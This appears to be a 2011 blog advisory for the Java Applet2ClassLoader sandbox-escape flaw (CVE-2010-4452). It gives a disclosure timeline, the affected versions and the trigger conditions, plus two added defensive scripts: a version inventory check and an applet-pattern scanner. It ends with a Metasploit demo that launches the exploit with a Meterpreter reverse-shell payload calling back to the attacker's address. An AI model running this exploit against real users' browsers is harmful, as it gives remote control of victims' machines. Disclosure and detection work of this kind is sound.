Mar 21, 2011

Oracle Java Applet2ClassLoader Remote Code Execution Exploit

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Timeline :
Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by:
Frederic Hoguin
jduck

Reference(s) :
CVE-2010-4452
ZDI-11-084
OSVDB-71193

Affected versions :
Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :
Oracle JRE 6 Update 16
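A quick inventory check derived from the affected range and the tested version listed above. This is an added example, not code from the original post or from the Metasploit module: it parses the first line of `java -version` output and reports Java 6 installs at Update 23 or earlier as affected; the host names and banners in the sample inventory are constructed.

```python
"""Inventory check for the affected range stated in the advisory (JRE/JDK 6 up to Update 23).

Added example, not from the original post. Input is the first line of `java -version`
output; the banners below are constructed samples.
"""
import re

# Matches e.g.  java version "1.6.0_16"  or  java version "1.7.0"
_BANNER_RE = re.compile(r'java version "(\d+)\.(\d+)\.(\d+)(?:_(\d+))?"')


def parse_java_version(banner):
    """Return (family, update), e.g. (6, 16) for 1.6.0_16; None if the banner is unrecognised."""
    m = _BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, _micro, update = m.groups()
    # Sun/Oracle numbering: "1.6.x" is Java 6, "1.7.x" is Java 7.
    family = int(minor) if int(major) == 1 else int(major)
    return family, int(update or 0)


def is_affected(banner):
    """True for Java 6 at Update 23 or earlier (the range the advisory gives); None if unparsable.

    Other families are reported as not affected only because the advisory does not
    list them, not because they were assessed here.
    """
    parsed = parse_java_version(banner)
    if parsed is None:
        return None
    family, update = parsed
    return family == 6 and update <= 23


def triage(banners):
    """Map each host name to its verdict for a dict of {host: banner}."""
    return {host: is_affected(banner) for host, banner in banners.items()}


# Constructed sample inventory (host names and banners are made up).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.6.0_16"',   # the version the post says the PoC was tested on
    "ws-02": 'java version "1.6.0_23"',   # last update inside the stated affected range
    "ws-03": 'java version "1.6.0_24"',   # first update outside the stated range
    "ws-04": 'java version "1.7.0"',
    "ws-05": "no java installed",
}

if __name__ == "__main__":
    labels = {True: "AFFECTED", False: "not affected", None: "unknown"}
    for host, verdict in triage(SAMPLE_INVENTORY).items():
        print(host, labels[verdict])
```

Feed it the banner collected from each host (for example from a software-inventory export) and treat `None` as "go and look", since a banner that does not parse is not evidence of absence.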

Description :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. The applet will run outside of the sandbox when it is invoked with:
1. A "codebase" parameter that points at a trusted directory
2. A "code" parameter that is a URL that does not contain any dots
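The two conditions above are something a web proxy, mail gateway or log review can look for in served HTML. The scanner below is an added example, not code from the original post or from the Metasploit module. It assumes that a "codebase" using the file: scheme, or a bare Windows drive path, stands in for the "trusted directory" the description mentions, and it flags <applet> tags whose "code" attribute is an absolute URL containing no dots. The sample HTML is constructed.

```python
"""Heuristic check for the applet invocation pattern described in the advisory.

Added example (not code from the original post or from the Metasploit module).
Assumptions: a "codebase" using the file: scheme, or a bare Windows drive path,
stands in for the "trusted directory" the text mentions; a "code" value is treated
as a URL when it has both a scheme and a host.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def is_trusted_codebase(codebase):
    """Assumption: file: URLs and bare drive paths (C:\\...) point at local, trusted directories."""
    if not codebase:
        return False
    cb = codebase.strip().lower()
    return cb.startswith("file:") or (len(cb) >= 2 and cb[0].isalpha() and cb[1] == ":")


def is_dotless_url_code(code):
    """True when "code" is an absolute URL (scheme + host) that contains no dot at all."""
    if not code:
        return False
    code = code.strip()
    parsed = urlparse(code)
    return bool(parsed.scheme) and bool(parsed.netloc) and "." not in code


class AppletScanner(HTMLParser):
    """Collects (line, codebase, code) for every <applet> tag matching both conditions."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "applet":  # html.parser already lower-cases tag and attribute names
            return
        a = dict(attrs)
        if is_trusted_codebase(a.get("codebase")) and is_dotless_url_code(a.get("code")):
            self.findings.append((self.getpos()[0], a.get("codebase"), a.get("code")))


def scan_html(html):
    """Return the list of suspicious applet invocations found in an HTML document."""
    scanner = AppletScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one ordinary applet, one matching the advisory's pattern,
# and one with a file: codebase whose "code" URL contains dots (so it is not flagged).
SAMPLE_HTML = """<html><body>
<applet code="Hello.class" codebase="/applets/" width="1" height="1"></applet>
<applet codebase="file:///C:/" code="http://dotless-host/" width="1" height="1"></applet>
<applet codebase="file:///C:/" code="http://192.0.2.10/x" width="1" height="1"></applet>
</body></html>"""

if __name__ == "__main__":
    for line, codebase, code in scan_html(SAMPLE_HTML):
        print(f"line {line}: codebase={codebase!r} code={code!r}")
```

The check is deliberately narrow: it mirrors the two conditions the description gives and nothing more, so a match is a strong signal but a non-match says nothing about other applet abuse. Applying the patched version from the affected-versions list is the actual fix; this scanner only helps find pages or captures worth a closer look.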

Metasploit demo :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
